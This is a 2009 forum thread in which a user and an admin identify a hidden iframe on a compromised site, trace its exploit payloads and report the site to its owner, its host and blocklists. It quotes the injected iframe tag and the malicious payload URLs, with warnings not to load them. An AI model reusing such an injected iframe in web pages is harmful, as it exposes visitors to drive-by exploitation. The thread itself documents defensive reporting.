Iframe Question

The latest malware threats from across the security forums

Moderators: Admin Team, Moderators

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Iframe Question

Postby Mystery » Mon Aug 17, 2009 4:47 pm

I didn't find another place on the forums to post this question. Anyhow I would like to know what an iframe like this is, does it connect to an IRC server? I've caught it on a "trusted" site because I'm using NoScript and forbid iframes, so that it has shown up as icon (blocked item) for me.
<iframe src="http://3f9.ru:8080/index.php" width=103 height=109 style="visibility: hidden"></iframe>


Thanks for a reply in advance :)
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 5:58 pm

That's an exploit ;)

Payload comes via;

/cache/readme.pdf
/cache/load.php
/cache/flash.swf

Note: DO NOT load these or the above URL in a browser!!!
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 6:00 pm

This particular one has the payload itself coming from;

Code: Select all

bestlitediscover.cn:8080/landig.php?id=8


Again, DO NOT load this in a browser.

Ref:
http://wepawet.cs.ucsb.edu/view.php?has ... 22&type=js
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Mon Aug 17, 2009 6:09 pm

Thanks a lot for your quick reply and all the info! :D
I did a search but couldn't find anything about it.

Yeah, I thought it was malicious. This is why I'm blocking iframes, and don't add general exceptions to any sites as they can be compromised.

I informed the website owner by email as soon as I spotted it because it was clear to me that it shouldn't be there, but I have no idea how long it will take until they read it and take any steps. And this site is frequented by many people... :(

Anyhow, I appreciate your clarifications on this chrz
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 6:16 pm

No problem :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Mon Aug 17, 2009 7:12 pm

Thanks to whoever has moved this topic to a more suitable subforum :)

Btw, could you please additionally tell me how dangerous it is to visit this compromised website for a user who does not block any scripts? :?
If it's dangerous and the website owner doesn't reply me by tomorrow, I might try to do some alerting of users.
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:24 am

Given the exploits, it's extremely dangerous.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 6:46 pm

Darn! grgr I have to think about a way to protect visitors, I can't just sit back knowing about this :?

Thanks again MysteryFCM :)
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 6:51 pm

Which site is currently serving this?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 6:59 pm

http://www.rabbittell.com/
(made link unclickable)

As far as I have seen, only the main page is infected, the other pages not.
I emailed both people who are running this site, no reply yet. Given their inactivity since April, I don't know when and if they will see my email.
The site is registered on GoDaddy.com. This is what I've figured out so far.
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:08 pm

The site is also hosted by GoDaddy too, though I'd be surprised if you got them to respond let alone actually take action to clean it up or anything;

http://hosts-file.net/?s=208.109.181.133

Have you tried the contact address listed in the WhoIs?

http://hosts-file.net/?s=rabbittell.com&wn=1

I've checked the other pages on the site and it does indeed look like it's only the front page that's affected at present, which leads me to believe the attacker got in via FTP (which then of course, begs the question of why it's only the front page that's affected);

http://vurl.mysteryfcm.co.uk/?url=822892

I'll fire off an e-mail to both the address listed on contact.php and listed in the WhoIs, and fire off an e-mail to GoDaddy too (for all the good it'll do, they have a tendancy to completely ignore abuse reports)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 7:16 pm

I think that the email listed in the Whois is a very old one, but despite of that I tried it.
Also the official contact email address of Rabbit Tell, and the official contact email of Bruno Maestrini's website that I have found.

Yes, I have heard that GoDaddy doesn't do much about reports, therefore I haven't done this. But since I haven't got a reply to my emails, I thought of trying it nonetheless now.

Thank you for all your support in this! :D
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:22 pm

Just for kicks n giggles btw, this domain also happens to share it's IP with atleast one other malicious domain, and is on a range with a slew of other malicious domains;

http://hosts-file.net/?s=208.109.181.133&view=matches
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 7:31 pm

Wouldn't it be true for all cheap hosted domains nowadays? ?>!
I mean the number of new malicious domains are growing like mushroom after rain...

Lol, I just checked my own website's pages... Phew, nothing.
Last edited by Mystery on Tue Aug 18, 2009 7:39 pm, edited 1 time in total.
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:38 pm

Sadly, yep. Thankfully there are still some hosting co's that will respond and take down, malicious sites found on their networks though ;)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Thu Aug 20, 2009 6:20 am

That's true :)

I'm glad to see that it has been added as a reported attacker site for now, this will prevent a number of people from visiting it.
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Thu Aug 20, 2009 6:57 am

It was added to hpHosts too :)

Sadly, there's been absolutely no response from either the domain owner, or the hosting co.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!

User avatar
Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Re: Iframe Question

Postby Mystery » Thu Aug 20, 2009 7:21 am

Yup, I've seen that it's on the hpHosts list, too. :)

Yeah, neither did I receive any response...
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)


Return to “Latest Malware Threats”

Who is online

Users browsing this forum: No registered users and 2 guests